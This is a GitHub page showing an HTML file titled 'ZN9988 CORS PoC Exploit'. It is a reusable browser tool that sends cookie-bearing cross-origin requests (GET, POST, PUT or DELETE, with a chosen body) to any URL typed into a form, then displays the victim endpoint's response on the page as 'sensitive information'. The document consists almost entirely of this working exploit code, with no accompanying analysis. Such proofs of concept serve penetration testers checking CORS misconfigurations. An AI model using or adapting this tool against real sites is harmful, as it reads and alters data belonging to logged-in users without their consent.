zn9988.github.io/CORS-Exploit.html at main · zn9988/zn9988.github.io · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
<!DOCTYPE html>
<html>
   <head>
      <title>ZN9988 CORS PoC Exploit</title>
      <meta charset="UTF-8">
      <script type="text/javascript">
         function cors() {
            var URL = document.getElementById('urlbox').value;
            var method = document.getElementById('method').value;
            var contentType = document.getElementById('contentType').value;
            var requestBody = document.getElementById('body').value;

            var xhttp = new XMLHttpRequest();
            xhttp.onreadystatechange = function() {
               if (this.readyState == 4) {
                  if (this.status == 200) {
                     var responseType = xhttp.getResponseHeader("Content-Type");
                     if (responseType && responseType.includes("application/json")) {
                        var jsonResponse = JSON.parse(xhttp.responseText);
                        document.getElementById("InfoDisclosure").innerHTML = "<pre>" + JSON.stringify(jsonResponse, null, 2) + "</pre>";
                     } else {
                        document.getElementById("InfoDisclosure").innerHTML = this.responseText;
                     }
                  } else {
                     document.getElementById("InfoDisclosure").innerHTML = "Request failed with status: " + this.status;
                  }
               }
            };

            xhttp.open(method, URL, true);
            xhttp.withCredentials = true;  // Ensure cookies are included

            if (method !== "GET" && requestBody) {
               xhttp.setRequestHeader("Content-Type", contentType);
               xhttp.send(requestBody);
            } else {
               xhttp.send();
            }
         }
      </script>
   </head>
   <body>
      <center>
         <h2>ZN9988 CORS PoC Exploit</h2>
         <label for="urlbox">URL:</label><br>
         <input type="text" id="urlbox" size="52" value="" placeholder="https://vulnerable-endpoint.com"><br><br>

         <label for="method">HTTP Method:</label><br>
         <select id="method">
            <option value="GET">GET</option>
            <option value="POST">POST</option>
            <option value="PUT">PUT</option>
            <option value="DELETE">DELETE</option>
         </select><br><br>

         <label for="contentType">Content-Type:</label><br>
         <select id="contentType">
            <option value="application/json">application/json</option>
            <option value="application/x-www-form-urlencoded">application/x-www-form-urlencoded</option>
            <option value="text/plain">text/plain</option>
         </select><br><br>

         <label for="body">Request Body (for POST/PUT):</label><br>
         <textarea id="body" rows="6" cols="50" placeholder='{"key": "value"}'></textarea><br><br>

         <button type="button" onclick="cors()">Exploit</button>

         <h3>Upon successful exploitation, sensitive information abused via CORS from arbitrary origins will be displayed below.</h3>
         <div id="InfoDisclosure">
         </div>
      </center>
   </body>
</html>